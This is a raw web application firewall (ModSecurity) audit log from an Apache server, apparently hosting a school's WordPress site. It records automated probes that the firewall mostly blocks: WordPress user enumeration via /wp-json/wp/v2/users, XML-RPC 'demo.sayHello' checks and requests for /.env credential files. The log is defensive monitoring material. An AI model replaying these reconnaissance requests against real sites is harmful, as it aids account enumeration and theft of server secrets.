Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1bca851f-Z-- --203ed40b-A-- [11/May/2025:01:17:05 +0700] aB-YIauC4AqLGUOyzyUh6AAAAJI 103.236.140.4 45434 103.236.140.4 8181 --203ed40b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.32 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --203ed40b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --203ed40b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746901025764902 4008 (- - -) Stopwatch2: 1746901025764902 4008; combined=2136, p1=637, p2=1464, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --203ed40b-Z-- --3f411b2b-A-- [11/May/2025:01:17:15 +0700] aB-YK8i6w7GTj2w44Z7jWAAAAME 103.236.140.4 45582 103.236.140.4 8181 --3f411b2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.32 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f411b2b-C-- demo.sayHello --3f411b2b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f411b2b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746901035218059 6384 (- - -) Stopwatch2: 1746901035218059 6384; combined=4789, p1=571, p2=3989, p3=35, p4=36, p5=95, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f411b2b-Z-- --f281611d-A-- [11/May/2025:03:07:43 +0700] aB-yDxLuBiaF9R054QC42AAAAAY 103.236.140.4 36700 103.236.140.4 8181 --f281611d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.255 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f281611d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f281611d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746907663483023 2519 (- - -) Stopwatch2: 1746907663483023 2519; combined=1210, p1=417, p2=764, p3=0, p4=0, p5=29, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f281611d-Z-- --b8acd570-A-- [11/May/2025:03:07:48 +0700] aB-yFNr9PbfRBMhzxmSxXgAAAEw 103.236.140.4 36780 103.236.140.4 8181 --b8acd570-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.255 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b8acd570-C-- demo.sayHello --b8acd570-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8acd570-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746907668723247 5927 (- - -) Stopwatch2: 1746907668723247 5927; combined=4508, p1=547, p2=3731, p3=34, p4=36, p5=96, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8acd570-Z-- --40052b4d-A-- [11/May/2025:03:22:42 +0700] aB-1kk8xOExV7lPH_DlPCAAAAMM 103.236.140.4 44830 103.236.140.4 8181 --40052b4d-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 138.68.82.23 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 138.68.82.23 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --40052b4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40052b4d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746908562124661 1082 (- - -) Stopwatch2: 1746908562124661 1082; combined=339, p1=307, p2=0, p3=0, p4=0, p5=32, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40052b4d-Z-- --48257d6e-A-- [11/May/2025:03:26:26 +0700] aB-2cgpy530QiWmSS60QXwAAAFI 103.236.140.4 44860 103.236.140.4 8181 --48257d6e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --48257d6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48257d6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746908786944826 3253 (- - -) Stopwatch2: 1746908786944826 3253; combined=1344, p1=458, p2=851, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48257d6e-Z-- --e0b18737-A-- [11/May/2025:03:26:35 +0700] aB-2e-bs1CLLACKj-_yghAAAAI0 103.236.140.4 44864 103.236.140.4 8181 --e0b18737-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.120 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e0b18737-C-- demo.sayHello --e0b18737-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0b18737-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746908795483183 6499 (- - -) Stopwatch2: 1746908795483183 6499; combined=4542, p1=600, p2=3664, p3=28, p4=31, p5=137, sr=82, sw=82, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0b18737-Z-- --0e970d72-A-- [11/May/2025:03:52:01 +0700] aB-8cUEuxCpmyy5aJPlNVQAAAAU 103.236.140.4 51562 103.236.140.4 8181 --0e970d72-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; moto g(7) play) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --0e970d72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e970d72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746910321610342 936 (- - -) Stopwatch2: 1746910321610342 936; combined=339, p1=285, p2=0, p3=0, p4=0, p5=54, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e970d72-Z-- --085baa6e-A-- [11/May/2025:03:55:07 +0700] aB-9Kwpy530QiWmSS60ZygAAAFg 103.236.140.4 57192 103.236.140.4 8181 --085baa6e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --085baa6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --085baa6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910507815567 2709 (- - -) Stopwatch2: 1746910507815567 2709; combined=1321, p1=423, p2=859, p3=0, p4=0, p5=39, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --085baa6e-Z-- --d2cf066d-A-- [11/May/2025:03:55:15 +0700] aB-9M08xOExV7lPH_DlaZQAAAMs 103.236.140.4 57426 103.236.140.4 8181 --d2cf066d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.251 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d2cf066d-C-- demo.sayHello --d2cf066d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2cf066d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910515655114 6918 (- - -) Stopwatch2: 1746910515655114 6918; combined=4947, p1=620, p2=4089, p3=36, p4=37, p5=95, sr=76, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2cf066d-Z-- --f2dd897f-A-- [11/May/2025:03:55:56 +0700] aB-9XObs1CLLACKj-_yqqwAAAJA 103.236.140.4 58514 103.236.140.4 8181 --f2dd897f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.62 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f2dd897f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2dd897f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910556868802 3420 (- - -) Stopwatch2: 1746910556868802 3420; combined=1530, p1=562, p2=938, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2dd897f-Z-- --0f68ab16-A-- [11/May/2025:03:56:05 +0700] aB-9ZQpy530QiWmSS60aCgAAAFA 103.236.140.4 58770 103.236.140.4 8181 --0f68ab16-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0f68ab16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f68ab16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910565441138 3095 (- - -) Stopwatch2: 1746910565441138 3095; combined=1394, p1=466, p2=896, p3=0, p4=0, p5=31, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f68ab16-Z-- --8576d44e-A-- [11/May/2025:03:56:06 +0700] aB-9Zk8xOExV7lPH_DlbLgAAANc 103.236.140.4 58788 103.236.140.4 8181 --8576d44e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.62 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8576d44e-C-- demo.sayHello --8576d44e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8576d44e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910566665368 6787 (- - -) Stopwatch2: 1746910566665368 6787; combined=4853, p1=649, p2=3953, p3=38, p4=43, p5=100, sr=134, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8576d44e-Z-- --2c4e8d14-A-- [11/May/2025:03:56:11 +0700] aB-9a0EuxCpmyy5aJPlPLwAAAAE 103.236.140.4 58932 103.236.140.4 8181 --2c4e8d14-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.175 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2c4e8d14-C-- demo.sayHello --2c4e8d14-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c4e8d14-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910571601205 17469 (- - -) Stopwatch2: 1746910571601205 17469; combined=26182, p1=587, p2=3981, p3=42, p4=42, p5=10780, sr=74, sw=83, l=0, gc=10667 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c4e8d14-Z-- --25210433-A-- [11/May/2025:03:56:33 +0700] aB-9gUEuxCpmyy5aJPlPUQAAAAw 103.236.140.4 59486 103.236.140.4 8181 --25210433-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.245 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --25210433-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25210433-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910593378449 3114 (- - -) Stopwatch2: 1746910593378449 3114; combined=1303, p1=398, p2=822, p3=0, p4=0, p5=83, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25210433-Z-- --a818eb59-A-- [11/May/2025:03:56:35 +0700] aB-9gwpy530QiWmSS60aOgAAAEQ 103.236.140.4 59536 103.236.140.4 8181 --a818eb59-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a818eb59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a818eb59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910595022019 2672 (- - -) Stopwatch2: 1746910595022019 2672; combined=1454, p1=504, p2=919, p3=0, p4=0, p5=31, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a818eb59-Z-- --3fe1bf7c-A-- [11/May/2025:03:56:41 +0700] aB-9iQpy530QiWmSS60aSgAAAEc 103.236.140.4 59688 103.236.140.4 8181 --3fe1bf7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.245 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3fe1bf7c-C-- demo.sayHello --3fe1bf7c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fe1bf7c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910601201017 4034 (- - -) Stopwatch2: 1746910601201017 4034; combined=3129, p1=397, p2=2555, p3=19, p4=20, p5=80, sr=53, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
